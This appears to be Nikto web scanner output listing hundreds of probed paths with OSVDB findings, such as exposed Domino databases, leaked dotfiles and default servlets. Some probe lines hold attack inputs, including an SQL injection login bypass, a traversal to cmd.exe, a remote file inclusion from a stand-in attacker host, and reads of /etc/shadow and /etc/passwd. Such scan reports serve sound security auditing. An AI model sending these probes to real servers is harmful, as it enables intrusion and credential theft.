+ OSVDB-3092: /sample/site1w4646: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /sample/site2w4646: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /sample/site3w4646: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /schema50.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /secret.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /setupweb.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smbcfg.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smconf.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smency.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smmsg.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smquar.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smsolar.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smtime.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smtp.box: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smtp.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smtpibwq.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smtpobwq.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smtptbls.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /smvlog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /software.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /srvnam.htm: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /statmail.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /stauths.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /stautht.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /stconf.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /stconfig.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /stdnaset.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /stdomino.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /stlog.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /streg.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /stsrc.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /test.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /today.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /userreg.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /users.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /vpuserinfo.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /web.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /webuser.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /welcome.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3092: /wksinst.nsf: This database can be read without authentication, which may reveal sensitive information.
+ OSVDB-3093: /abonnement.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /acartpath/signin.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /add_acl: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admbrowse.php?down=1&amp;cur=%2Fetc%2F&amp;dest=passwd&amp;rid=1&amp;S=[someid]: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/auth.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configscreen.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsite.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configsql.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cfg/configtache.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/cms/htmltags.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/credit_card_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/exec.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/modules/cache.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/objects.inc.php4: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/script.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/settings.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/templates/header.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin/upload.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /admin_t/include/aff_liste_langue.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /adv/gm001-mc/: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /aff_news.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /approval/ts_app.htm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /archive.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /archive_forum.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ashnews.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /auth.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /b2-tools/gm-2-b2.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /bandwidth/index.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /basilix.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /bigsam_guestbook.php?displayBegin=9999...9999: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /bin/common/user_update_passwd.pl: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /biztalktracking/RawCustomSearchField.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /biztalktracking/rawdocdata.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /board/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /board/philboard_admin.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /bugtest+/+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /caupo/admin/admin_workspace.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ccbill/whereami.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /chat_dir/register.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /checkout_payment.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /communique.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /community/forumdisplay.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /community/index.php?analized=anything: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /community/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /compte.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /config/html/cnf_gi.htm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /convert-date.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cp/rac/nsManager.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /csPassword.cgi?command=remove%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cutenews/comments.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cutenews/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /cutenews/shownews.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /Data/settings.xml+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /database/metacart.mdb+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /db.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dbabble: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dcp/advertiser.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /defines.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dltclnt.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /doc/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /docs/NED: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/files/index_table.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/projects/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/projects/view.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/projects/vw_files.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/tasks/addedit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /dotproject/modules/tasks/viewgantt.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /do_map: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /do_subscribe: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /email.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /emml_email_func.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /emumail.cgi?type=.%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /enteteacceuil.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /etc/shadow+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /eventcal2.php.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ez2000/ezadmin.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ez2000/ezboard.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ez2000/ezman.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /faqman/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemanager/index.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemgmt/brokenfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemgmt/singlefile.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemgmt/viewcat.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /filemgmt/visit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /foro/YaBB.pl: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/mainfile.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/newreply.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/newthread.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum/viewtopic.php: phpBB found.
+ OSVDB-3093: /forum_arc.asp?n=268: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /forum_professionnel.asp?n=100: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /functions.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-10447: /get_od_toc.pl?Profile=: WebTrends get_od_toc.pl may be vulnerable to a path disclosure error if this file is reloaded multiple times.
+ OSVDB-3093: /globals.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /globals.pl: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-6656: /Gozila.cgi: Linksys BEF Series routers are vulnerable to multiple DoS attacks in Gozila.cgi.
+ OSVDB-3093: /homebet/homebet.dll?form=menu&amp;option=menu-signin: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /idealbb/error.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /iisprotect/admin/SiteAdmin.ASP?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /include/customize.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /include/help.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /includes/footer.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /includes/header.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/contact/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/faq/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/gen/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /infos/services/index.asp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /instaboard/index.cfm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /intranet/browse.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /invitefriends.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ipchat.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ixmail_netattach.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /jsptest.jsp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /kernel/class/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /kernel/classes/ezrole.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ldap.search.php3?ldap_serv=nonsense%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /livredor/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /login.php3?reason=chpass2%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mail/include.html: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mail/settings.html: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mambo/banners.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /manage/login.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mantis/summary_graph_functions.php?g_jpgraph_path=http%3A%2F%2Fattackershost%2Flistings.txt%3F: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /members/ID.pm: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /members/ID.xbb: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /mod.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif/delete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modif/ident.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Downloads/voteinclude.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Forums/attachment.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Search/index.php: This might be interesting... has been seen in web logs from an unknown scanner.                                    
+ OSVDB-3093: /modules/WebChat/in.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/out.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/quit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/WebChat/users.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /modules/Your_Account/navbar.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /moregroupware/modules/webmail2/inc/: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /msadc/Samples/SELECTOR/showcode.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /myguestBk/add1.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /myguestBk/admin/delEnt.asp?id=NEWSNUMBER|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /myguestBk/admin/index.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /netget?sid=Safety&amp;msg=2002&amp;file=Safety: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /newtopic.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /nphp/nphpd.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /OpenTopic: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /options.inc.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /oscommerce/default.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /parse_xml.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /php/gaestebuch/admin/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /php/php4ts.dll: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pks/lookup: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pm/lib.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /poppassd.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /produccart/pdacmin/login.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /productcart/database/EIPC.mdb: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /productcart/pc/Custva.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ProductCart/pc/msg.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /product_info.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /prometheus-all/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protected/: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protected/secret.html+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protectedpage.php?uid='%20OR%20''='&amp;pwd='%20OR%20''=': This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /protection.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pt_config.inc: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pvote/add.php?question=AmIgAy&amp;o1=yes&amp;o2=yeah&amp;o3=well..yeah&amp;o4=bad%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /pvote/del.php?pollorder=1%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /quikmail/nph-emumail.cgi?type=../%00: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /room/save_item.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /screen.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/tradecli.dll: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /scripts/tradecli.dll?template=nonexistfile?template=..\..\..\..\..\winnt\system32\cmd.exe?/c+dir: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /security/web_access.html: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /sendphoto.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /servers/link.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shop/php_files/site.config.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shop/search.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /shop/show.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /Site/biztalkhttpreceive.dll: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /site_searcher.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /spelling.php3+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /squirrelmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /staticpages/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /status.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /supporter/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /supporter/tupdate.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /sw000.asp?|-|0|404_Object_Not_Found: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /syslog.htm?%20: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /technote/print.cgi: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /texis/websearch/phine: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tinymsg.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /topic/entete.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /topsitesdir/edit.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /ttforum/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tutos/file/file_new.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /tutos/file/file_select.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /typo3/typo3/dev/translations.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /uifc/MultFileUploadHandler.php+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /url.jsp: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /useraction.php3: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /utils/sprc.asp+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /vars.inc+: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /VBZooM/add-subject.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /wbboard/profile.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /wbboard/reply.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcalendar/login.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webcalendar/view_m.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /web_app/WEB-INF/webapp.properties: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /XMBforum/buddy.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /XMBforum/member.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /x_stat_admin.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /yabbse/Reminder.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /yabbse/Sources/Packages.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /zentrack/index.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /_head.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: /database/: Databases? Really??
+ OSVDB-3093: /.wwwacl: Contains authorization information
+ OSVDB-3093: /.www_acl: Contains authorization information
+ OSVDB-3093: /.htpasswd: Contains authorization information
+ OSVDB-3093: /.access: Contains authorization information
+ OSVDB-3093: /.addressbook: PINE addressbook, may store sensitive e-mail address contact information and notes
+ OSVDB-3093: /.bashrc: User home dir was found with a shell rc file. This may reveal file and path information.
+ OSVDB-3093: /.bash_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.forward: User home dir was found with a mail forward file. May reveal where the user's mail is being forwarded to.
+ OSVDB-3093: /.history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.htaccess: Contains authorization information
+ OSVDB-3093: /.lynx_cookies: User home dir found with LYNX cookie file. May reveal cookies received from arbitrary web sites.
+ OSVDB-3093: /.mysql_history: Database SQL?
+ OSVDB-3093: /.passwd: Contains authorization information
+ OSVDB-3093: /.pinerc: User home dir found with a PINE rc file. May reveal system information, directories and more.
+ OSVDB-3093: /.plan: User home dir with a .plan, a now mostly outdated file for delivering information via the finger protocol 
+ OSVDB-3093: /.proclog: User home dir with a Procmail log file. May reveal user mail traffic, directories and more.
+ OSVDB-3093: /.procmailrc: User home dir with a Procmail rc file. May reveal subdirectories, mail contacts and more.
+ OSVDB-3093: /.profile: User home dir with a shell profile was found. May reveal directory information and system configuration.
+ OSVDB-3093: /.rhosts: A user's home directory may be set to the web root, a .rhosts file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.sh_history: A user's home directory may be set to the web root, the shell history was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/authorized_keys: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3093: /.ssh/known_hosts: A user's home directory may be set to the web root, an ssh file was retrieved. This should not be accessible via the web.
+ OSVDB-3233: /_vti_bin/shtml.exe/_vti_rpc: FrontPage may be installed.
+ OSVDB-3233: /jservdocs/: Default Apache JServ docs should be removed.
+ OSVDB-3233: /tomcat-docs/index.html: Default Apache Tomcat documentation found.
+ OSVDB-3233: /akopia/: Akopia is installed.
+ OSVDB-3233: /ojspdemos/basic/hellouser/hellouser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
+ OSVDB-3233: /ojspdemos/basic/simple/usebean.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
+ OSVDB-3233: /ojspdemos/basic/simple/welcomeuser.jsp: Oracle 9i default JSP page found, may be vulnerable to XSS in any field.
+ OSVDB-3233: /php/index.php: Monkey Http Daemon default PHP file found.
+ OSVDB-3233: /servlet/Counter: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/DateServlet: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/FingerServlet: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/HelloWorldServlet: JRun default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/SessionServlet: JRun or Netware WebSphere default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /servlet/SimpleServlet: JRun default servlet found (possibly Websphere). All default code should be removed from servers.
+ OSVDB-3233: /servlet/SnoopServlet: JRun, Netware Java Servlet Gateway, or WebSphere default servlet found. All default code should be removed from servers.
+ OSVDB-3233: /admcgi/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /admisapi/fpadmin.htm: Default FrontPage file found.
+ OSVDB-3233: /bin/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /bin/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /bin/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /cgi-bin/fpadmin.htm: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/admin.pl: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/contents.htm: Default FrontPage CGI found.
+ OSVDB-3233: /scripts/fpadmin.htm: Default FrontPage CGI found.                                        
+ OSVDB-3233: /_private/: FrontPage directory found.
+ OSVDB-3233: /_private/orders.htm: Default FrontPage file found.
+ OSVDB-3233: /_private/register.htm: Default FrontPage file found.
+ OSVDB-3233: /_private/_vti_cnf/: FrontPage directory found.
